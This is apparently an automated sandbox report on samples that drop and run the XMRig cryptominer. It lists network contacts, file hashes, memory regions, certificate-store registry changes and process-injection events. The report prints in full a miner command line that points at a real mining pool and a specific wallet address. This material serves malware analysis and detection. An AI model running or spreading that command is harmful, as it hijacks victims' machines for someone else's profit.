xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4056-16-0x0000024CFBB40000-0x0000024CFBB60000-memory.dmp
memory/4056-17-0x0000024CFBB80000-0x0000024CFBBA0000-memory.dmp
memory/4056-18-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-20-0x0000024D8E570000-0x0000024D8E590000-memory.dmp
memory/4056-19-0x0000024CFBBA0000-0x0000024CFBBC0000-memory.dmp
memory/4056-21-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-22-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-25-0x0000024D8E570000-0x0000024D8E590000-memory.dmp
memory/4056-24-0x0000024CFBBA0000-0x0000024CFBBC0000-memory.dmp
memory/4056-23-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-26-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-27-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-28-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-29-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-30-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-31-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-32-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-33-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-34-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-35-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-36-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-37-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-38-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-39-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-40-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-41-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-42-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-43-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-44-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-45-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-46-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-47-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-48-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-49-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-50-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-51-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-52-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-53-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-54-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-55-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-56-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-57-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-58-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-59-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-60-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-61-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-62-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-63-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-64-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-65-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-66-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-67-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-68-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-69-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-70-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-71-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-72-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-73-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-74-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-75-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-76-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-77-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-78-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-79-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-80-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-81-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-82-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-83-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
memory/4056-84-0x00007FF7DC8E0000-0x00007FF7DD3E3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1596 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1596 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2940-16-0x0000013EF2A10000-0x0000013EF2A30000-memory.dmp
memory/2940-17-0x0000013F84DC0000-0x0000013F84DE0000-memory.dmp
memory/2940-18-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-19-0x0000013F85200000-0x0000013F85220000-memory.dmp
memory/2940-20-0x0000013F85430000-0x0000013F85450000-memory.dmp
memory/2940-21-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-22-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-25-0x0000013F85430000-0x0000013F85450000-memory.dmp
memory/2940-24-0x0000013F85200000-0x0000013F85220000-memory.dmp
memory/2940-23-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-26-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-27-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-28-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-29-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-30-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-31-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-32-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-33-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-34-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-35-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-36-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-37-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-38-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-39-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-40-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-41-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-42-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-43-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-44-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-45-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-46-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-47-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-48-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-49-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-50-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-51-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-52-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-53-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-54-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-55-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-56-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-57-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-58-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-59-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-60-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-61-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-62-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-63-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-64-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-65-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-66-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-67-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-68-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-69-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-70-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-71-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-72-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-73-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-74-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-75-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-76-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-77-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-78-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-79-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-80-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-81-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-82-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-83-0x00007FF758640000-0x00007FF759143000-memory.dmp
memory/2940-84-0x00007FF758640000-0x00007FF759143000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:30
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
